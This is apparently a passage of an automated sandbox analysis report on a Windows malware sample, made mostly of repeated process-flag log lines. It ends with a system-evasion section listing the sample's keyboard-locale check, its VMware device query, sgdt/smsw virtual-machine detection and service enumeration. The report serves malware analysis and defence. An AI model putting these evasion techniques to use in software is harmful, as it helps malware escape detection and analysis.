          Source: C:\Users\user\Desktop\EXTRACTOSERFINANZA989543704031499704092798964.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\EXTRACTOSERFINANZA989543704031499704092798964.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\EXTRACTOSERFINANZA989543704031499704092798964.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\EXTRACTOSERFINANZA989543704031499704092798964.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\EXTRACTOSERFINANZA989543704031499704092798964.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\EXTRACTOSERFINANZA989543704031499704092798964.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\EXTRACTOSERFINANZA989543704031499704092798964.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\EXTRACTOSERFINANZA989543704031499704092798964.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\EXTRACTOSERFINANZA989543704031499704092798964.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\EXTRACTOSERFINANZA989543704031499704092798964.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\EXTRACTOSERFINANZA989543704031499704092798964.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\EXTRACTOSERFINANZA989543704031499704092798964.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\EXTRACTOSERFINANZA989543704031499704092798964.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\EXTRACTOSERFINANZA989543704031499704092798964.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\EXTRACTOSERFINANZA989543704031499704092798964.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\EXTRACTOSERFINANZA989543704031499704092798964.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\EXTRACTOSERFINANZA989543704031499704092798964.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\EXTRACTOSERFINANZA989543704031499704092798964.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\EXTRACTOSERFINANZA989543704031499704092798964.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\EXTRACTOSERFINANZA989543704031499704092798964.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\EXTRACTOSERFINANZA989543704031499704092798964.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\EXTRACTOSERFINANZA989543704031499704092798964.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX

          Malware Analysis System Evasion:

          barindex
          Country aware sample found (crashes after keyboard check)Show sources
          Source: c:\users\user\desktop\extractoserfinanza989543704031499704092798964.exeEvent Logs and Signature results: Application crash and keyboard check
          Source: C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exeFile opened / queried: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exeCode function: 24_2_01033080 sgdt fword ptr [eax]24_2_01033080
          Source: C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exeCode function: 24_2_01033080 smsw word ptr [edx+edx*4-74AAFF22h]24_2_01033080
          Source: C:\Users\user\Desktop\EXTRACTOSERFINANZA989543704031499704092798964.exeCode function: OpenSCManagerA,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV?$allocator@G@1@@Z,EnumServicesStatusW,EnumServicesStatusW,GetLastError,malloc,EnumServicesStatusW,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBGABV10@@Z,??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBGABV10@@Z,??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z,??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,OpenServiceW,QueryServiceConfigW,GetLastError,malloc,QueryServiceConfigW,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z,??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z,??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBGABV10@@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z,??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,free,CloseServiceHandle,free,CloseServiceHandle,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,7_2_004113C9
          Source: C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exeCode function: OpenSCManagerA,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV?$allocator@G@1@@Z,EnumServicesStatusW,EnumServicesStatusW,GetLastError,malloc,EnumServicesStatusW,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBGABV10@@Z,??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBGABV10@@Z,??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z,??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,OpenServiceW,QueryServiceConfigW,GetLastError,malloc,QueryServiceConfigW,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z,??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z,??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBGABV10@@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z,??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@